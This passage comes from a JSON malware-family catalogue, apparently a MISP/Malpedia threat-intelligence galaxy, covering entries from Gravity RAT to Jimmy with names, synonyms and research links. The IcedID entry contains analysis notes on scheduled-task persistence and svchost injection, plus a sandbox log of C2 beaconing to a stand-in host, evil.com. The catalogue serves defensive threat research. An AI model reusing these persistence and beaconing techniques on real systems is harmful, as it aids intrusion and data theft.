"https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" ], "synonyms": [], "type": [] }, "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", "value": "Gravity RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", "https://blog.cylance.com/spear-a-threat-actor-resurfaces" ], "synonyms": [ "eoehttp" ], "type": [] }, "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" ], "synonyms": [], "type": [] }, "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", "value": "GROK" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", "https://attack.mitre.org/wiki/Technique/T1003" ], "synonyms": [], "type": [] }, "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", "value": "gsecdump" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" ], "synonyms": [], "type": [] }, "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", "value": "H1N1 Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", "value": "Hacksfase" }, { "description": "Py2Exe based tool as found on github.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", "https://github.com/ratty3697/HackSpy-Trojan-Exploit" ], "synonyms": [], "type": [] }, "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", "value": "HackSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" ], "synonyms": [], "type": [] }, "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", "value": "Hamweq" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", 
"https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://boozallenmts.com/resources/news/closer-look-hancitor", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" ], "synonyms": [ "Chanitor" ], "type": [] }, "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", "value": "Hancitor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" ], "synonyms": [], "type": [] }, "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", "value": "HappyLocker (HiddenTear?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" ], "synonyms": [ "Piptea" ], "type": [] }, "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", "value": "Harnig" }, { "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. 
Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", "https://www.f-secure.com/weblog/archives/00002718.html" ], "synonyms": [], "type": [] }, "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", "value": "Havex RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", 
"https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ "Predator Pain" ], "type": [] }, "uuid": "31615066-dbff-4134-b467-d97a337b408b", "value": "HawkEye Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", "value": "Helauto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], "synonyms": [], "type": [] }, "uuid": "19d89300-ff97-4281-ac42-76542e744092", "value": "Helminth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" ], "synonyms": [], "type": [] }, "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", "value": "Heloag" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" ], "synonyms": [], "type": [] }, "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", "value": "Herbst" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], 
"synonyms": [], "type": [] }, "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", "value": "Heriplor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], "type": [] }, "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", "value": "Hermes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], "type": [] }, "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", "value": "Hermes Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" ], "synonyms": [], "type": [] }, "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", "value": "HerpesBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" ], "synonyms": [], "type": [] }, "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", "value": "HesperBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", "https://twitter.com/struppigel/status/950787783353884672", "https://github.com/goliate/hidden-tear" ], "synonyms": [], "type": [] }, "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", "value": "HiddenTear" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", 
"http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" ], "synonyms": [], "type": [] }, "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", "value": "HideDRV" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", "https://www.recordedfuture.com/hidden-lynx-analysis/", "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [], "type": [] }, "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", "value": "HiKit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" ], "synonyms": [], "type": [] }, "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", "value": "himan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" ], "synonyms": [], "type": [] }, "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", "value": "Hi-Zor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" ], "synonyms": [], "type": [] }, "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", "value": "HLUX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" ], "synonyms": [], "type": [] }, "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", "value": "homefry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" ], "synonyms": [], "type": [] }, "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", "value": "HtBot" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", "https://www.riskiq.com/blog/labs/htprat/" ], "synonyms": [], "type": [] }, "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", "value": "htpRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", "https://www.secureworks.com/research/htran" ], "synonyms": [ "HUC Packet Transmit Tool" ], "type": [] }, "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", "value": "HTran" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" ], "synonyms": [], "type": [] }, "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", "value": "HttpBrowser" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [ "httpdr0pper" ], "type": [] }, "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", "value": "httpdropper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [], "type": [] }, "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", "value": "http_troy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", 
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" ], "synonyms": [ "houdini" ], "type": [] }, "uuid": "94466a80-964f-467e-b4b3-0e1375174464", "value": "Hworm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", "https://securelist.com/luckymouse-hits-national-data-center/86083/" ], "synonyms": [], "type": [] }, "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", "value": "HyperBro" }, { "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata% appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. 
waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] 
[https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", "https://www.youtube.com/watch?v=wObF9n2UIAM", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" ], "synonyms": [ "BokBot" ], "type": [] }, "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", "value": "IcedID" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" ], "synonyms": [], "type": [] }, "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", "value": "IcedID Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", "http://www.kz-cert.kz/page/502" ], "synonyms": [], "type": [] }, "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", "value": "Icefog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/", "https://securelist.com/ice-ix-not-cool-at-all/29111/", "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus" ], "synonyms": [], "type": [] }, "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", "value": "Ice IX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", "https://isc.sans.edu/diary/22766" ], "synonyms": [], "type": [] }, "uuid": "3afecded-3461-45f9-8159-e8328e56a916", "value": "IDKEY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" ], "synonyms": [], "type": [] }, "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", "value": "IISniff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] }, "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", "value": "Imecab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", 
"https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" ], "synonyms": [], "type": [] }, "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", "value": "Imminent Monitor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" ], "synonyms": [ "Foudre" ], "type": [] }, "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", "value": "Infy" }, { "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" ], "synonyms": [], "type": [] }, "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", "value": "InnaputRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" ], "synonyms": [], "type": [] }, "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", "value": "InvisiMole" }, { "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. 
This led to two main branches: one became known as Gozi Prinimalka, which was merged with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. 
The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", "https://lokalhost.pl/gozi_tree.txt", "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html" ], "synonyms": [ "Gozi ISFB", "IAP", "Pandemyia" ], "type": [] }, "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", "value": "ISFB" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", "http://www.clearskysec.com/ismagent/" ], "synonyms": [], "type": [] }, "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", "value": "ISMAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", "http://www.clearskysec.com/greenbug/", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" ], "synonyms": [], "type": [] }, "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", "value": "ISMDoor" }, 
{ "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", "https://www.zscaler.com/blogs/research/ispy-keylogger" ], "synonyms": [], "type": [] }, "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", "value": "iSpy Keylogger" }, { "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses a hard-coded user agent string: HardCore Software For : Public", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" ], "synonyms": [], "type": [] }, "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", "value": "ISR Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" ], "synonyms": [], "type": [] }, "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", "value": "IsSpace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" ], "synonyms": [], "type": [] }, "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", "value": "JackPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", "http://malware-traffic-analysis.net/2017/05/16/index.html", "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", "value": "Jaff" }, { "description": "", 
"meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" ], "synonyms": [], "type": [] }, "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", "value": "Jager Decryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" ], "synonyms": [ "Reconcyc" ], "type": [] }, "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", "value": "Jaku" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", "value": "Jasus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" ], "synonyms": [], "type": [] }, "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", "value": "Jigsaw" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" ], "synonyms": [], "type": [] }, "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", "value": "Jimmy" }, { "description": "", "meta": { "refs": [ 